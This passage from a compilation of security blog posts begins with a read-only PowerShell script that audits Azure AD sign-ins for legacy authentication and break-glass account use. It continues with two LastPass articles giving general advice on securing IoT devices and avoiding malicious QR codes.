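Import-Module Microsoft.Graph.Reports
Connect-MgGraph -Scopes 'AuditLog.Read.All', 'Directory.Read.All'

$breakGlass = @('breakglass1@example.com', 'breakglass2@example.com')   # assumed placeholder UPNs
$since      = (Get-Date).AddDays(-7).ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')

# Client app names Azure AD reports for modern authentication. Anything else
# (Exchange ActiveSync, IMAP4, POP3, SMTP, "Other clients", ...) is legacy and
# cannot be challenged for MFA, which is why the checklist has you block it.
$modernClients = @('Browser', 'Mobile Apps and Desktop clients')

$signIns = Get-MgAuditLogSignIn -Filter "createdDateTime ge $since" -All

# 1. Legacy authentication: which users, protocols and apps still rely on it?
$legacy = $signIns | Where-Object { $_.ClientAppUsed -and $_.ClientAppUsed -notin $modernClients }
Write-Host ("Legacy-auth sign-ins in window: {0}" -f @($legacy).Count)
$legacy |
    Group-Object UserPrincipalName, ClientAppUsed, AppDisplayName |
    Sort-Object Count -Descending |
    Select-Object Count, Name |
    Format-Table -AutoSize

# 2. Break glass accounts: any sign-in at all deserves a look, because these
#    accounts are exempt from MFA and Conditional Access.
$bgUse = @($signIns | Where-Object { $_.UserPrincipalName -in $breakGlass })
if ($bgUse.Count -gt 0) {
    Write-Warning ("Break glass account activity detected: {0} sign-in(s)" -f $bgUse.Count)
    $bgUse |
        Select-Object CreatedDateTime, UserPrincipalName, IPAddress, AppDisplayName,
            @{ n = 'Result'; e = { if ($_.Status.ErrorCode -eq 0) { 'Success' } else { "Failure ($($_.Status.ErrorCode))" } } } |
        Format-Table -AutoSize
} else {
    Write-Host 'No break glass sign-ins in the last 7 days.'
}
```

This is a point-in-time review; the checklist item about alerting is better served by an always-on rule (for example a log-based alert on the same UserPrincipalName values) so that a break glass sign-in pages someone the moment it happens rather than when the next review runs.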


Go Further than Identity to Protect your M365 Tenant

There you have it, all the most important steps to take to make sure your users’ identities are kept secure, and therefore your tenant and its data also safeguarded. Keen to learn and do more?

The Microsoft 365 Security Checklist has another nine chapters of security recommendations each with its own checklist for:

  • Email
  • Teams
  • SharePoint
  • Applications
  • Endpoint Manager
  • Information Protection
  • Secure Score
  • Business Premium
  • Microsoft 365 Enterprise E5


Source :
https://www.altaro.com/microsoft-365/identity-checklist-m365-tenant/

Password Security and the Internet of Things (IoT)

The Internet of Things (IoT) is here, and we’re using it for everything from getting instant answers to random trivia questions to screening visitors at the door. According to Gartner, we were expected to use more than 25 billion internet-connected devices by the end of 2021. But as our digital lives have become more convenient, we might not yet have considered the risks involved with using IoT devices.

How can you keep yourself secure in today’s IoT world, where hackers aim to outsmart your smart home? First we’ll look at how hackers infiltrate the IoT, and then we’ll look at what you can do right now to make sure the IoT is working for you – not against you.

How hackers are infiltrating the Internet of Things

While we’ve become comfortable asking voice assistants to give us the weather forecast while we prep our dinners, hackers have been figuring out how to commandeer our IoT devices for cyber attacks. Here are just a few examples of how cyber criminals are already infiltrating the IoT.

Gaining access to and control of your camera

Have you ever seen someone with a sticker covering the camera on their laptop or smartphone? There’s a reason for that. Hackers have been known to gain access to these cameras and spy on people. This has become an even more serious problem in recent years, as people have been relying on videoconferencing to safely connect with friends and family, participate in virtual learning, and attend telehealth appointments during the pandemic. Cameras now often come with an indicator light that lets you know whether they’re being used. It’s a helpful protective measure, but not a failsafe one.

Using voice assistants to obtain sensitive information

According to Statista, 132 million Americans used a digital voice assistant once a month in 2021. Like any IoT gadget, however, they can be vulnerable to attack. According to Ars Technica, academic researchers have discovered that the Amazon Echo can be forced to take commands from itself, which opens the door to major mischief in a smart home. Once an attacker has compromised an Echo, they can use it to unlock doors, make phone calls and unauthorized purchases, and control any smart home appliances that the Echo manages.

Many bad actors prefer the quiet approach, however, slipping in undetected and stealing information. They can piggyback on a voice assistant’s privileged access to a victim’s online accounts or other IoT gadgets and make off with any sensitive information they desire. With the victim being none the wiser, the attackers can use that information to commit identity fraud or stage even more ambitious cyber crimes.

Hacking your network and launching a ransomware attack

Any device that is connected to the internet, whether it’s a smart security system or even a smart fridge, can be used in a cyber attack. Bad actors know that most people aren’t keeping their IoT gadgets’ software up to date in the same way they do their computers and smartphones, so they take advantage of that false sense of security. Once cyber criminals have gained access to an IoT device, they can go after other devices on the same network. (This is because most home networks are designed to trust devices that are already connected to them.) When these malicious actors are ready, they can launch a ransomware attack that brings your entire digital life to a halt – unless you agree to fork over a hefty sum in bitcoin, that is.

Using bots to launch a DDoS attack

Although most people never notice it, hackers can and do infect IoT devices with malware en masse, gaining control over them in the process. Having turned these zombie IoT devices into bots, the hackers then collectively use them to stage what’s called a botnet attack on their target of choice. This form of assault is especially popular for launching distributed denial of service (DDoS) attacks, in which all the bots in a botnet collectively flood a target with network requests until it buckles and goes offline.

How you can keep your Internet of Things gadgets safe from hackers

So how can you protect your IoT devices from these determined hackers? Fortunately, you can take back control by becoming just a little more cyber smart. Here are a few ways to keep your IoT gadgets safe from hackers:

  • Never use the default settings on your IoT devices. Although IoT devices are designed to be plug-and-play so you can start enjoying them right away, their default settings are often not nearly as secure as they should be. With that in mind, set up a unique username and strong password combination before you start using any new IoT technology. While you’re at it, see if there’s an option to encrypt the traffic to and from your IoT device. If there is, turn it on.
  • Keep your IoT software up to date. Chances are, you regularly install the latest software updates on your computer and phone. Hackers are counting on you to leave your IoT gadgets unpatched, running outdated software with vulnerabilities they can exploit, so be sure to keep the software on your IoT devices up to date as well.
  • Practice good password hygiene. We all slip into bad password habits from time to time – it’s only human – but they put our IoT security at risk. With this in mind, avoid re-using passwords and be sure to set unique, strong passwords on each of your IoT devices. Update those passwords from time to time, too. Don’t store your passwords in a browser, and don’t share them via email. A password manager can help you securely store and share your passwords, so hackers never have a chance to snatch them.
  • Use secure, password-protected WiFi. Cyber criminals are notorious for sneaking onto open, insecure WiFi networks. Once they’re connected, they can spy on any internet activity that happens over those networks, steal login credentials, and launch cyber attacks if they feel like it. For this reason, make sure that you and your IoT devices only use secure, password-protected WiFi.
  • Use multi-factor authentication as an extra layer of protection. Multi-factor authentication (MFA), gives you extra security on top of all the other measures we mentioned above. It asks you to provide one more credential, or factor, in addition to a password to confirm you are who you say you are. If you have MFA enabled and a hacker tries to log in as you, you’ll get a notification that a login attempt is in progress. Whenever you have the option to enable MFA on any account or technology, take advantage of it.

Protect your Internet of Things devices with smart password security

The IoT is making our lives incredibly convenient, but that convenience can be a little too seductive at times. It’s easy to forget that smart home devices, harmless-looking and helpful as they are, can be targeted in cyber attacks just like our computers and phones. Hackers are counting on you to leave your IoT gadgets unprotected so they can use them to launch damaging attacks. By following these smart IoT security tips, you can have the best of both worlds, enjoying your smart life and better peace of mind at the same time.


Source :
https://blog.lastpass.com/2022/08/password-security-and-the-iot/

Staying Safe With QR Codes

QR codes link the offline to the online. What started as a way to streamline manufacturing in the automotive industry is now a widespread technology helping connect the physical world to digital content. And as the world embraced remote, no-touch solutions during the Covid pandemic, QR codes became especially popular. QR codes offer convenience and immediacy for businesses and consumers, but cybercriminals also take advantage of them. Here’s what you need to know about QR codes and how to stay safe when using them. 

Why QR codes? 

Due to their size and structure, the two-dimensional black and white barcodes we call QR codes are very versatile. And since most people carry a smartphone everywhere, they can quickly scan QR codes with their phone’s camera. Moreover, since QR codes are relatively easy to program and accessible for most smartphone users, they can be an effective communication tool. 

They also have many uses. For example, QR codes may link to a webpage, start an app or file download, share contact information, initiate a payment, and more. Covid forced businesses to be creative with touchless experiences, and QR codes provide a convenient way to transform a physical touchpoint into a digital interaction. During Covid, QR codes became a popular way to look at restaurant menus, communicate Covid policies, check in for an appointment, and view marketing promotions, among other scenarios.  

As a communication tool, QR codes can transmit a lot of information from one person to another, making it easy for someone to take action online and interact further with digital content.  

What hackers do with QR codes 

QR codes are inherently secure, and no personally identifiable information (PII) is transmitted while you’re scanning them. However, the tricky part about QR codes is that you don’t know what information they contain until you scan them. So just looking at the QR code won’t tell you if it’s entirely trustworthy or not. 

For example, cybercriminals may try to replace or sticker over a QR code in a high-traffic, public place. Doing so can trick people into scanning a malicious QR code. Or, hackers might send malicious QR codes digitally by email, text, or social media. The QR code scam might target a specific individual, or cybercriminals may design it to attract as many scans as possible from a large number of people. 

Once scanned, a malicious QR code may take you to a phishing website, lead you to install malware on your device, redirect a payment to the wrong account, or otherwise compromise the security of your private information.  

In the same way that cybercriminals try to get victims to click phishing links in email or social media, they lure people into scanning a QR code. These bad actors may be after account credentials, financial information, PII, or even company information. With that information, they can steal your identity or money or even break into your employer’s network for more valuable information (in other words, causing a data breach). 

QR code best practices for better security 

For the most part, QR code best practices mirror the typical security precautions you should take on social media and elsewhere in your digital life. However, there are also a few special precautions to keep in mind regarding QR codes. 

Pay attention to context. Where is the code available? What does the code claim to do (e.g., will it send you to a landing page)? Is there someone you can ask to confirm the purpose of the QR code? Did someone send it unprompted? Is it from a business or individual you’ve never heard of? Just like with phishing links, throw it out when in doubt. 

Look closely at the code. Some codes may have specific colors or branding to indicate the code’s purpose and destination. Many codes are generic black and white designs, but sometimes there are clues about who made the code. 

Check the link before you click. If you scan the QR code and a link appears, double-check it before clicking. Is it a website URL you were expecting? Is it a shortened link that masks the full URL? Is the webpage secure (HTTPS)? Do you see signs of a phishing attack (branding is slightly off, strange URL, misspelled words, etc.)? If it autogenerates an email or text message, who is the recipient and what information is it sending them? If it’s a payment form, who is receiving the payment? Read carefully before taking action. 

Practice password security. Passwords and account logins remain one of the top targets of cyber attacks. Stolen credentials give cybercriminals access to valuable personal and financial information. Generate every password for every account with a random password generator, ideally built into a password manager for secure storage and autofill. Following password best practices ensures one stolen password results in minimal damage. 

Layer with MFA. Adding multi-factor authentication to logins further protects against phishing attacks that steal passwords. With MFA in place, a hacker still can’t access an account after using a stolen password. By requiring additional login data, MFA can prevent cybercriminals from gaining access to personal or business accounts. 

QR codes remain a popular marketing and communication tool. They’re convenient and accessible, so you can expect to encounter them occasionally. Though cyber attacks via QR codes are less common, you should still stay vigilant for signs of phishing and social engineering via QR codes. To prevent and mitigate attacks via QR codes, start by building a solid foundation of digital security with a trusted password manager.

Source :
https://blog.lastpass.com/2022/08/staying-safe-with-qr-codes/